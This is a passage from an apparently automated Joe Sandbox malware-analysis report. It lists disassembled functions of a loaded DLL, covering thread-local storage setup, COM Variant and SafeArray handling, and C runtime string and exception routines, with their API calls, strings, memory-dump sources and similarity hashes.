Part of subcall function 6CE8E97C: DecodePointer.KERNEL32(00000014,6CE8A397,6CE8A37D,6CEB95C0,00000008,6CE8A468,?,?,?,6CEB95E0,0000000C,6CE8A523,?), ref: 6CE8E98D
Part of subcall function 6CE8E97C: TlsFree.KERNEL32(00000023,6CE8A397,6CE8A37D,6CEB95C0,00000008,6CE8A468,?,?,?,6CEB95E0,0000000C,6CE8A523,?), ref: 6CE8E9A7
Part of subcall function 6CE8E97C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6CE8A397,6CE8A37D,6CEB95C0,00000008,6CE8A468,?,?,?,6CEB95E0,0000000C,6CE8A523,?), ref: 6CE92325
Part of subcall function 6CE8E97C: DeleteCriticalSection.KERNEL32(00000023,?,?,6CE8A397,6CE8A37D,6CEB95C0,00000008,6CE8A468,?,?,?,6CEB95E0,0000000C,6CE8A523,?), ref: 6CE9234F

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6CE8ECC7
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6CE8ECD4
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6CE8ECE1
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6CE8ECEE
TlsAlloc.KERNEL32(?,?,6CE8A2D4,6CEB95C0,00000008,6CE8A468,?,?,?,6CEB95E0,0000000C,6CE8A523,?), ref: 6CE8ED3E
TlsSetValue.KERNEL32(00000000,?,?,6CE8A2D4,6CEB95C0,00000008,6CE8A468,?,?,?,6CEB95E0,0000000C,6CE8A523,?), ref: 6CE8ED59
__init_pointers.LIBCMT ref: 6CE8ED63
EncodePointer.KERNEL32(?,?,6CE8A2D4,6CEB95C0,00000008,6CE8A468,?,?,?,6CEB95E0,0000000C,6CE8A523,?), ref: 6CE8ED74
EncodePointer.KERNEL32(?,?,6CE8A2D4,6CEB95C0,00000008,6CE8A468,?,?,?,6CEB95E0,0000000C,6CE8A523,?), ref: 6CE8ED81
EncodePointer.KERNEL32(?,?,6CE8A2D4,6CEB95C0,00000008,6CE8A468,?,?,?,6CEB95E0,0000000C,6CE8A523,?), ref: 6CE8ED8E
EncodePointer.KERNEL32(?,?,6CE8A2D4,6CEB95C0,00000008,6CE8A468,?,?,?,6CEB95E0,0000000C,6CE8A523,?), ref: 6CE8ED9B
DecodePointer.KERNEL32(Function_0006EB00,?,?,6CE8A2D4,6CEB95C0,00000008,6CE8A468,?,?,?,6CEB95E0,0000000C,6CE8A523,?), ref: 6CE8EDBC
__calloc_crt.LIBCMT ref: 6CE8EDD1
DecodePointer.KERNEL32(00000000,?,?,6CE8A2D4,6CEB95C0,00000008,6CE8A468,?,?,?,6CEB95E0,0000000C,6CE8A523,?), ref: 6CE8EDEB
GetCurrentThreadId.KERNEL32 ref: 6CE8EDFD

Strings

FlsFree, xrefs: 6CE8ECE3
FlsSetValue, xrefs: 6CE8ECD6
KERNEL32.DLL, xrefs: 6CE8ECA0
FlsAlloc, xrefs: 6CE8ECC1
FlsGetValue, xrefs: 6CE8ECC9

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 1868149495-3819984048
Opcode ID: ca95ae592b8c29fce9c96b3641f6d3536f8f8830fd0db409c5c5e88c956f431c
Instruction ID: 4fec72528b6b8c85ce1ef9879c6b175b5c8e740d504a1752cebf27d9d2ff1f7b
Opcode Fuzzy Hash: ca95ae592b8c29fce9c96b3641f6d3536f8f8830fd0db409c5c5e88c956f431c
Instruction Fuzzy Hash: D1315C76B027149FDF11BFB9BC0866A3BF4BB46668734057AE43893A90DB34C541CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE30EA0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE30EF2
std::_Xinvalid_argument.LIBCPMT ref: 6CE30F14
_memmove.LIBCMT ref: 6CE30F70
_memmove.LIBCMT ref: 6CE30F95
_memmove.LIBCMT ref: 6CE30FA9
_memmove.LIBCMT ref: 6CE30FDB
_memmove.LIBCMT ref: 6CE31182
std::_Xinvalid_argument.LIBCPMT ref: 6CE311B6

Strings

invalid string position, xrefs: 6CE311B1
string too long, xrefs: 6CE30EED, 6CE30F0F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 8a78d2f1d48db35e276fa24dd52b849a05dda26159a16fdb9347b65716835988
Instruction ID: 5dba705835fb8182fd365ac65a947dcb6382a67023c6774484c50f3e0eb52daf
Opcode Fuzzy Hash: 8a78d2f1d48db35e276fa24dd52b849a05dda26159a16fdb9347b65716835988
Instruction Fuzzy Hash: 29B17E717001649BDB28CE5CCD91A9E73B6EB86354734591CF89ACBB81C634FC46CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE97FC4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getBasicDataType.LIBCMT ref: 6CE97FFF
DName::operator=.LIBCMT ref: 6CE98013
DName::operator+=.LIBCMT ref: 6CE98021
UnDecorator::getPtrRefType.LIBCMT ref: 6CE9804D
UnDecorator::getDataIndirectType.LIBCMT ref: 6CE980CA
UnDecorator::getBasicDataType.LIBCMT ref: 6CE980D3
operator+.LIBCMT ref: 6CE98166

Strings

std::nullptr_t, xrefs: 6CE98122
volatile, xrefs: 6CE9800B, 6CE98139
PXl, xrefs: 6CE97FE1

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
String ID: PXl$std::nullptr_t$volatile
API String ID: 2203807771-3672921068
Opcode ID: 232196cbb437008a19ef9d2d47c6a5259cee587a0d2c7dda6bd23e30992d3fc0
Instruction ID: 9b41878956c5747a458e3e9f97b817e58fa8ecb1f3107ee5726d44ee3a3d6173
Opcode Fuzzy Hash: 232196cbb437008a19ef9d2d47c6a5259cee587a0d2c7dda6bd23e30992d3fc0
Instruction Fuzzy Hash: D84192B2904108BFDB209F94C9409EE7B74FB0634DF30816BF9696BB61D7319646CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE449B0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 174COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6CEA05A8), ref: 6CE449EE
VariantInit.OLEAUT32(?), ref: 6CE449F7
VariantInit.OLEAUT32(?), ref: 6CE449FD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CE44A08
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CE44A39
VariantClear.OLEAUT32(?), ref: 6CE44A45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE44B66
VariantClear.OLEAUT32(?), ref: 6CE44B76
VariantClear.OLEAUT32(?), ref: 6CE44B7C
VariantClear.OLEAUT32(6CEA05A8), ref: 6CE44B82

Strings

1l, xrefs: 6CE44B52
1l, xrefs: 6CE44B11

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID: 1l$1l
API String ID: 2515392200-1092580327
Opcode ID: 7f0efe20ccdf56cd2d160317f342fb3056ded8916118f2db0c5b5430aaa9edb9
Instruction ID: bdc6e8f3291d8b18fb9be629c04a36a2edb437dba4076876690adc37107e664b
Opcode Fuzzy Hash: 7f0efe20ccdf56cd2d160317f342fb3056ded8916118f2db0c5b5430aaa9edb9
Instruction Fuzzy Hash: 3F515072A002199FDB04DFA4DC84EAEB7B8FF89314F14816AE915EB744D734E901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE44BA0 Relevance: 19.7, APIs: 10, Strings: 1, Instructions: 475COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CE44BDC
VariantInit.OLEAUT32(?), ref: 6CE44BE5
VariantInit.OLEAUT32(?), ref: 6CE44BEB
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CE44BF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CE44C2A
VariantClear.OLEAUT32(?), ref: 6CE44C37
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE45107
VariantClear.OLEAUT32(?), ref: 6CE45117
VariantClear.OLEAUT32(?), ref: 6CE4511D
VariantClear.OLEAUT32(?), ref: 6CE45123

Strings

2l, xrefs: 6CE44D1A, 6CE44EFF, 6CE45031, 6CE44D1D, 6CE44F02, 6CE45034

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID: 2l
API String ID: 2515392200-408751688
Opcode ID: 0e883c6306a0ea00e15a454f58c50e6fd13cccf320a8210ed03ec1e44b4c5fbe
Instruction ID: 950b95a6107f9405cb56485c1acddc54fea3b5fc30dad0e1c0213e7844b63413
Opcode Fuzzy Hash: 0e883c6306a0ea00e15a454f58c50e6fd13cccf320a8210ed03ec1e44b4c5fbe
Instruction Fuzzy Hash: 2512E576615705AFC758DB99DD84DAAB3B9BF8C300F14466CF50AABB91CA30F841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3F95E Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 332COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE3FA0F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE3FA22
SafeArrayGetElement.OLEAUT32 ref: 6CE3FA5A

Part of subcall function 6CE43A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE43B71
Part of subcall function 6CE43A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE43B83

Part of subcall function 6CE469C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CE46A08
Part of subcall function 6CE469C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE46A15
Part of subcall function 6CE469C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CE46A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Part of subcall function 6CE3DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CE3DFF6
Part of subcall function 6CE3DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE3E003
Part of subcall function 6CE3DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CE3E02F

Strings

RS7m, xrefs: 6CE3FC82
RS{m, xrefs: 6CE3FC3E

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID: RS7m$RS{m
API String ID: 959723449-144615663
Opcode ID: 37a79aaf1b5a1258c1fb64bdc2dc1d96954007b979bd98b517310588a9b143f1
Instruction ID: a989334fa2cd610d2d266ff0e42f63ba4663b4dafcd7b0ff1ec2236c05fcb700
Opcode Fuzzy Hash: 37a79aaf1b5a1258c1fb64bdc2dc1d96954007b979bd98b517310588a9b143f1
Instruction Fuzzy Hash: 89C15070A012059FDB04DF68CC84FADB7BAAF85308F309198E949EB786DB75E945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE43690 Relevance: 18.2, APIs: 12, Instructions: 215COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CE436CD
VariantInit.OLEAUT32(?), ref: 6CE436DA
VariantInit.OLEAUT32(?), ref: 6CE436E0
VariantInit.OLEAUT32(?), ref: 6CE436E6
VariantInit.OLEAUT32 ref: 6CE437DD
VariantCopy.OLEAUT32(?,?), ref: 6CE437E4
VariantInit.OLEAUT32 ref: 6CE43815
VariantCopy.OLEAUT32(?,?), ref: 6CE4381C
VariantClear.OLEAUT32(?), ref: 6CE438A8
VariantClear.OLEAUT32(?), ref: 6CE438AE
VariantClear.OLEAUT32(?), ref: 6CE438B4
VariantClear.OLEAUT32(?), ref: 6CE438BA

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$Init$Clear$Copy
String ID:
API String ID: 3833040332-0
Opcode ID: 2be04aa0373f64b4df2c3b461db59eb39a9d4b9b7a1b78b73692bb928110ce5c
Instruction ID: e92af246032a1d84d3369698d1f4ffdafd3d32e2fd29bcf7fa1655744b6ba461
Opcode Fuzzy Hash: 2be04aa0373f64b4df2c3b461db59eb39a9d4b9b7a1b78b73692bb928110ce5c
Instruction Fuzzy Hash: A1814D71A01219AFDB04DFA8D884FEEBBB9BF49308F24855DE505A7741DB34E909CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4D880 Relevance: 18.2, APIs: 12, Instructions: 202COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CE4D8EC
VariantInit.OLEAUT32 ref: 6CE4D902
VariantInit.OLEAUT32(?), ref: 6CE4D90D
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CE4D929
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CE4D966
VariantClear.OLEAUT32(?), ref: 6CE4D973
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CE4D9B4
VariantClear.OLEAUT32(?), ref: 6CE4D9C1
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4DA6F
VariantClear.OLEAUT32(?), ref: 6CE4DA80
VariantClear.OLEAUT32(?), ref: 6CE4DA87
VariantClear.OLEAUT32(?), ref: 6CE4DA99

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
String ID:
API String ID: 1625659656-0
Opcode ID: 3ac8705f622d522feafe3653fb0cadf0fc9e0bba1058ef4114c1008e49b05e44
Instruction ID: 0d083c76dfbb40b6e52f636b77afdd5e8b14ac21f1fc531efab9660aff7fbaec
Opcode Fuzzy Hash: 3ac8705f622d522feafe3653fb0cadf0fc9e0bba1058ef4114c1008e49b05e44
Instruction Fuzzy Hash: 798115762083019FC700CF64D844B5AB7F4BFD9718F148A5DE99897750EB74EA05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE312A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE312DD
std::_Xinvalid_argument.LIBCPMT ref: 6CE312FB
_memmove.LIBCMT ref: 6CE31368
_memmove.LIBCMT ref: 6CE3139F
std::_Xinvalid_argument.LIBCPMT ref: 6CE3140C

Strings

invalid string position, xrefs: 6CE31407
string too long, xrefs: 6CE312D8, 6CE312F6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: f2021ca2480621fcb442a9a62832ca85ee5c5c826954316a6b27cbc63acdf0d2
Instruction ID: b17d0cdeacd2c19b248cf823b7c9ae44063a98b3ed504c7339140f40b0f46e29
Opcode Fuzzy Hash: f2021ca2480621fcb442a9a62832ca85ee5c5c826954316a6b27cbc63acdf0d2
Instruction Fuzzy Hash: 034182313012649BD714CE9CDC80A9EB3B6EB853587351A2EE49ACBF40D734F845C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE25AAC Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE25ACB

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE25ABC

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

__CxxThrowException@8.LIBCMT ref: 6CE25AE0

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE25B18
__CxxThrowException@8.LIBCMT ref: 6CE25B2D

Strings

0Bl, xrefs: 6CE25AF3
0Bl, xrefs: 6CE25AD9
0Bl, xrefs: 6CE25B26
0Bl, xrefs: 6CE25B22, 6CE25B15

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
String ID: 0Bl$0Bl$0Bl$0Bl
API String ID: 921928366-3678277316
Opcode ID: 7da9193513fa91501694e3696958de914e71ea3f192b7a8d21556ef9e6423ca3
Instruction ID: fd574e32ac7c8bd56fd58deb1363eee1267fa69851cdc33794bcaccbcffafac1
Opcode Fuzzy Hash: 7da9193513fa91501694e3696958de914e71ea3f192b7a8d21556ef9e6423ca3
Instruction Fuzzy Hash: C10100B2C112086FDB04DFE4D9419EE77B8AF15744F20856DE909A7A50EB34E608CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4CD20 Relevance: 15.5, APIs: 10, Instructions: 485COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CE4CD5C
VariantInit.OLEAUT32(?), ref: 6CE4CD65
VariantInit.OLEAUT32(?), ref: 6CE4CD6B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CE4CD76
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CE4CDAA
VariantClear.OLEAUT32(?), ref: 6CE4CDB7
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE4D2A5
VariantClear.OLEAUT32(?), ref: 6CE4D2B5
VariantClear.OLEAUT32(?), ref: 6CE4D2BB
VariantClear.OLEAUT32(?), ref: 6CE4D2C1

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
